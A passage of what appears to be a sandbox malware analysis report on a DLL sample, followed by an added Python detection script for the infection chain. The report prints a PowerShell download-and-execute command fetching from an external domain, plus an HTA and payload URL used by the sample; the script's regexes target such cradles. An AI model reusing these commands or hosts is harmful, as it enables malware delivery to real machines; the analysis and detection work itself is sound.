        Has exited:true

        Target ID:9
        Start time:12:06:52
        Start date:22/05/2024
        Path:C:\Windows\System32\WerFault.exe
        Wow64 process (32bit):false
        Commandline:C:\Windows\system32\WerFault.exe -u -p 3504 -s 244
        Imagebase:0x7ff611130000
        File size:570'736 bytes
        MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Target ID:12
        Start time:12:06:55
        Start date:22/05/2024
        Path:C:\Windows\System32\rundll32.exe
        Wow64 process (32bit):false
        Commandline:rundll32.exe C:\Users\user\Desktop\UPazTgVGA7.dll,xlAutoOpen
        Imagebase:0x7ff7b7400000
        File size:71'680 bytes
        MD5 hash:EF3179D498793BF4234F708D3BE28633
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Target ID:13
        Start time:12:06:57
        Start date:22/05/2024
        Path:C:\Windows\SysWOW64\mshta.exe
        Wow64 process (32bit):true
        Commandline:"C:\Windows\SysWOW64\mshta.exe" "C:\users\public\example.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} mshta
        Imagebase:0x9b0000
        File size:13'312 bytes
        MD5 hash:06B02D5C097C7DB1F109749C45F3F505
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:moderate
        Has exited:true

        Target ID:15
        Start time:12:06:57
        Start date:22/05/2024
        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Wow64 process (32bit):true
        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'iapartmentlistings.com/tykhwuxk')
        Imagebase:0x1b0000
        File size:433'152 bytes
        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Target ID:16
        Start time:12:06:57
        Start date:22/05/2024
        Path:C:\Windows\System32\conhost.exe
        Wow64 process (32bit):false
        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Imagebase:0x7ff6d64d0000
        File size:862'208 bytes
        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Target ID:17
        Start time:12:06:58
        Start date:22/05/2024
        Path:C:\Windows\System32\rundll32.exe
        Wow64 process (32bit):false
        Commandline:rundll32.exe "C:\Users\user\Desktop\UPazTgVGA7.dll",hash
        Imagebase:0x7ff7b7400000
        File size:71'680 bytes
        MD5 hash:EF3179D498793BF4234F708D3BE28633
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Target ID:18
        Start time:12:06:58
        Start date:22/05/2024
        Path:C:\Windows\System32\rundll32.exe
        Wow64 process (32bit):false
        Commandline:rundll32.exe "C:\Users\user\Desktop\UPazTgVGA7.dll",xlAutoOpen
        Imagebase:0x7ff7b7400000
        File size:71'680 bytes
        MD5 hash:EF3179D498793BF4234F708D3BE28633
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Target ID:20
        Start time:12:06:58
        Start date:22/05/2024
        Path:C:\Windows\System32\WerFault.exe
        Wow64 process (32bit):false
        Commandline:C:\Windows\system32\WerFault.exe -u -p 7376 -s 424
        Imagebase:0x7ff611130000
        File size:570'736 bytes
        MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Has exited:true

        Target ID:22
        Start time:12:06:59
        Start date:22/05/2024
        Path:C:\Windows\SysWOW64\mshta.exe
        Wow64 process (32bit):true
        Commandline:"C:\Windows\SysWOW64\mshta.exe" "C:\users\public\example.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} mshta
        Imagebase:0x9b0000
        File size:13'312 bytes
        MD5 hash:06B02D5C097C7DB1F109749C45F3F505
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Has exited:true

        Target ID:23
        Start time:12:07:00
        Start date:22/05/2024
        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Wow64 process (32bit):true
        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'iapartmentlistings.com/tykhwuxk')
        Imagebase:0x1b0000
        File size:433'152 bytes
        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Has exited:true

        Target ID:24
        Start time:12:07:00
        Start date:22/05/2024
        Path:C:\Windows\System32\conhost.exe
        Wow64 process (32bit):false
        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Imagebase:0x7ff6d64d0000
        File size:862'208 bytes
        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Has exited:true

          APIs
          Strings
          Memory Dump Source
          • Source File: 00000003.00000002.2194386126.00007FF8BFAB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8BFAB0000, based on PE: true
          • Associated: 00000003.00000002.2194369343.00007FF8BFAB0000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000003.00000002.2194404409.00007FF8BFAB4000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000003.00000002.2194423489.00007FF8BFAB9000.00000004.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_3_2_7ff8bfab0000_rundll32.jbxd
          Similarity
          • API ID: QueryVirtual
          • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
          • API String ID: 1804819252-1534286854
          • Opcode ID: ff20adf7c188d621bc95c9e66d7c1f46b2629ec79b15ce19cc76e873bdd8993b
          • Instruction ID: a19c7c87764d8a415cfdd3cc6b3d82126227870ffbd1a835e177718184687d32
          • Opcode Fuzzy Hash: ff20adf7c188d621bc95c9e66d7c1f46b2629ec79b15ce19cc76e873bdd8993b
          • Instruction Fuzzy Hash: 0941BF71A08F0282EA089F99E4967B97BA4FF45BC8F446135DB0D07396EE3CE545C700
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000003.00000002.2194386126.00007FF8BFAB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8BFAB0000, based on PE: true
          • Associated: 00000003.00000002.2194369343.00007FF8BFAB0000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000003.00000002.2194404409.00007FF8BFAB4000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000003.00000002.2194423489.00007FF8BFAB9000.00000004.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_3_2_7ff8bfab0000_rundll32.jbxd
          Similarity
          • API ID: ExecuteShell
          • String ID: c:\users\public\example.hta$https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txt$mshta$open
          • API String ID: 587946157-3291801218
          • Opcode ID: e3c409afdc72bbf396cfbf0a4b302ed212031b5393d0bcd3fc2828a60e136157
          • Instruction ID: a3f768f18aad5c50f54649dae7d2368e406bb32b920232e3afd06afc5e355ae7
          • Opcode Fuzzy Hash: e3c409afdc72bbf396cfbf0a4b302ed212031b5393d0bcd3fc2828a60e136157
          • Instruction Fuzzy Hash: 86E0C97190CE4691EB189F98F8563E53764FB4838CF80613ADA4E42666DF7C9209C744
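          The process listing and the ShellExecute string block above record one chain: rundll32 loads the DLL from the user's Desktop, a ShellExecute call opens c:\users\public\example.hta with mshta (a download URL sits next to it in the same function), and mshta starts PowerShell with Invoke-Expression over an irm download. The following is an added example, not Joe Sandbox output and not code from the sample: Python detection logic for that chain, run over constructed Sysmon-style process-creation events built from the command lines shown in the listing. The PIDs, field names and rule names are assumptions made for the example.

```python
"""Detection logic for the chain seen in the report:
rundll32 (DLL under C:\\Users) -> mshta (HTA in C:\\users\\public)
-> powershell (Invoke-Expression over an irm download).

Events are Sysmon Event ID 1 style dicts. EVENTS is constructed for this
example from the report's command lines; the PIDs are placeholders.
"""
import ntpath
import re

# Constructed input: one dict per process creation, parent linked by ppid.
EVENTS = [
    {"pid": 1001, "ppid": 1000, "image": r"C:\Windows\System32\loaddll64.exe",
     "cmdline": r'loaddll64.exe "C:\Users\user\Desktop\UPazTgVGA7.dll"'},
    {"pid": 1002, "ppid": 1001, "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Users\user\Desktop\UPazTgVGA7.dll,xlAutoOpen"},
    {"pid": 1003, "ppid": 1002, "image": r"C:\Windows\SysWOW64\mshta.exe",
     "cmdline": r'"C:\Windows\SysWOW64\mshta.exe" "C:\users\public\example.hta" '
                r"{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} mshta"},
    {"pid": 1004, "ppid": 1003,
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
                r"-Command Invoke-Expression (irm -Uri 'iapartmentlistings.com/tykhwuxk')"},
    # Benign control (constructed): interactive PowerShell, parent not in the log.
    {"pid": 1005, "ppid": 1000,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile'},
]

SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe", "cmd.exe"}
# Folders every user can write to; a script launched from here is suspect.
PUBLIC_DIRS = ("c:\\users\\public\\", "c:\\windows\\temp\\", "c:\\programdata\\")
# rundll32 whose DLL argument points into a user profile.
USER_PROFILE_DLL = re.compile(r"rundll32(\.exe)?\s+\"?[a-z]:\\users\\", re.I)
IEX = re.compile(r"invoke-expression|\biex\b", re.I)
FETCH = re.compile(r"invoke-restmethod|invoke-webrequest|\birm\b|\biwr\b|downloadstring", re.I)


def _base(path: str) -> str:
    # Match on the image basename so System32/SysWOW64 redirection does not matter.
    return ntpath.basename(path).lower()


def detect(events: list[dict]) -> list[dict]:
    """Return one alert dict per (rule, process) match."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        img, cl = _base(e["image"]), e["cmdline"]
        parent = by_pid.get(e["ppid"])
        pimg = _base(parent["image"]) if parent else ""

        def hit(rule: str) -> None:
            alerts.append({"rule": rule, "pid": e["pid"], "image": img, "cmdline": cl})

        # Rule 1: a script interpreter handed a script in a world-writable folder.
        if img in SCRIPT_HOSTS and any(d in cl.lower() for d in PUBLIC_DIRS):
            hit("script_from_public_folder")
        # Rule 2: mshta should never be the parent of another interpreter.
        if pimg == "mshta.exe" and img in SCRIPT_HOSTS:
            hit("mshta_child_interpreter")
        # Rule 3: rundll32 loading a DLL from a user profile, then spawning a script host.
        if pimg == "rundll32.exe" and img in SCRIPT_HOSTS and USER_PROFILE_DLL.search(parent["cmdline"]):
            hit("rundll32_user_dll_spawns_script_host")
        # Rule 4: PowerShell download cradle, a fetch fed straight into Invoke-Expression.
        if img == "powershell.exe" and IEX.search(cl) and FETCH.search(cl):
            hit("powershell_download_cradle")
    return alerts


if __name__ == "__main__":
    for a in detect(EVENTS):
        print(f"[{a['rule']}] pid={a['pid']} {a['image']}: {a['cmdline'][:80]}")
```

          On the constructed events the mshta process trips rules 1 and 3 and the PowerShell process trips rules 2 and 4; the benign PowerShell produces nothing. The rules compare image basenames rather than full paths on purpose: in the listing, the 32-bit mshta launched PowerShell with a System32 command line while the image that actually ran resolved to SysWOW64, so a rule keyed on the literal path would miss it.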
          APIs
          Memory Dump Source
          • Source File: 00000003.00000002.2194386126.00007FF8BFAB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8BFAB0000, based on PE: true
          • Associated: 00000003.00000002.2194369343.00007FF8BFAB0000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000003.00000002.2194404409.00007FF8BFAB4000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000003.00000002.2194423489.00007FF8BFAB9000.00000004.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_3_2_7ff8bfab0000_rundll32.jbxd
          Similarity
          • API ID: Sleep_amsg_exit
          • String ID:
          • API String ID: 1015461914-0
          • Opcode ID: 0a35f59cebe7f284c41c6f085f131cde47359b9507e63e2bc55cb021e80e0f1e
          • Instruction ID: e14187f9e0ac11e69900e7c81f42332d16f82d9e2110220663b543287c4cc9f3
          • Opcode Fuzzy Hash: 0a35f59cebe7f284c41c6f085f131cde47359b9507e63e2bc55cb021e80e0f1e
          • Instruction Fuzzy Hash: 0E417D32E09D4685F65A8B9EF85237927A9AF847DCF486436DF0C47392DE3DE8819300